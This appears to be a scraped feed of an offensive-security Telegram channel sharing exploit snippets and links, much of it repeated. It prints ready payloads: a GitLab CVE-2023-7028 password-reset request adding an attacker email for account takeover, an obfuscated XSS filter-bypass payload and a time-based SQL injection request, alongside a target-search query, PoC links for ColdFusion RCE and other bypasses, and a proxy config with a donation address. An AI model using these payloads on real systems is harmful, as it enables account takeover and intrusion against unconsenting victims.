Cyber Security Courses, Training, Certifications and Resources
The SANS Promise: Everyone who completes SANS training can apply the skills and knowledge they’ve learned the day they return to work.
#Sans #Courses
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
CVE-2023-7028 - GitLab CE/EE Account Takeover via Password Reset without user interactions
Poc:
#CVE #POC
————
0Day.Today
@LearnExploit
@Tech_Army
Poc:
user[email][]=valid@email.com&user[email][]=attacker@email.com
#CVE #POC
————
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
CVE-2023-7028 - GitLab CE/EE Account Takeover via Password Reset without user interactions Poc: user[email][]=valid@email.com&user[email][]=attacker@email.com #CVE #POC ———— 0Day.Today @LearnExploit @Tech_Army
CVE-2023-7028 - GitLab CE/EE Account Takeover via Password Reset without user interactions
Hunter query: `product.name="Gitlab"`
Hunter
#hunter
————
0Day.Today
@LearnExploit
@Tech_Army
Hunter query: `product.name="Gitlab"`
Hunter
#hunter
————
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
CVE-2023-7028 - GitLab CE/EE Account Takeover via Password Reset without user interactions Poc: user[email][]=valid@email.com&user[email][]=attacker@email.com #CVE #POC ———— 0Day.Today @LearnExploit @Tech_Army
GitHub
GitHub - Vozec/CVE-2023-7028: This repository presents a proof-of-concept of CVE-2023-7028
This repository presents a proof-of-concept of CVE-2023-7028 - Vozec/CVE-2023-7028
Moriarty - Moriarty scans for a variety of CVEs and vulnerabilities
Github
#CVE #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - BC-SECURITY/Moriarty: Moriarty is designed to enumerate missing KBs, detect various vulnerabilities, and suggest potential…
Moriarty is designed to enumerate missing KBs, detect various vulnerabilities, and suggest potential exploits for Privilege Escalation in Windows environments. - GitHub - BC-SECURITY/Moriarty: Mor...
CVE-2023-6875 - Authorization Bypass vulnerability in POST SMTP Mailer, a WordPress plugin with over 300,000+ active installations
POC
Read
#Bypass #CVE #POC #Wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
POC
Read
#Bypass #CVE #POC #Wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
XSS payload with Alert Obfuscation, for bypass RegEx filters⚡️
#XSS #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<img src="X" onerror=top[8680439..toString(30)](1337)>
#XSS #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
This media is not supported in your browser
VIEW IN TELEGRAM
Run Script with Python 2.7
python -m pip install requests
python -m pip install bs4
python -m pip install colorama
python -m pip install lxml
@LearnExploit
#Exploit #Tools
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
CVE-2023-26360 - Unauthenticated RCE in Adobe Coldfusion
POC
#CVE #POC #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
POC
#CVE #POC #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
SecureLayer7 - Offensive Security, API Scanner & Attack Surface Management
Unauthenticated RCE in Adobe Coldfusion – CVE-2023-26360
Overview CVE-2023-263060 was exploited in the wild in Adobe ColdFusion product, a commercial application server for rapid web application development. The vulnerability affects both the 2018 and...
Xiaomi HyperOS BootLoader Bypass - A PoC that exploits a vulnerability to bypass the Xiaomi HyperOS community restrictions of BootLoader unlocked account bindings
Github
#android
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#android
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - MlgmXyysd/Xiaomi-HyperOS-BootLoader-Bypass: A PoC that exploits a vulnerability to bypass the Xiaomi HyperOS community…
A PoC that exploits a vulnerability to bypass the Xiaomi HyperOS community restrictions of BootLoader unlocked account bindings. - MlgmXyysd/Xiaomi-HyperOS-BootLoader-Bypass
vless://d88cb128-8dcb-4216-b121-82a901c2ede2@s.thisisforu.sbs:43978?type=tcp&security=none#GR_SV5_MCI_MTN-%40LearnExploit
دویست گیگ داره
دونیت کنین بیشترش میکنم🔥
TRX:
TJqtCmgFUYkptcvzDuW8c4JRQNm5zpUwPA
#v2ray #config
——————
0Day.Today
@LearnExploit
@Tech_Army
MITRE Caldera - Automated Adversary Emulation Platform
Github
#RedTeam #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#RedTeam #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
SQL Injection
#sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
GET
/0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z/Folder/
HTTP/1.1
#sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
This media is not supported in your browser
VIEW IN TELEGRAM
Fuzzing and Bypassing the AWS WAF
Github
Read Here
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
Read Here
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Please open Telegram to view this post
VIEW IN TELEGRAM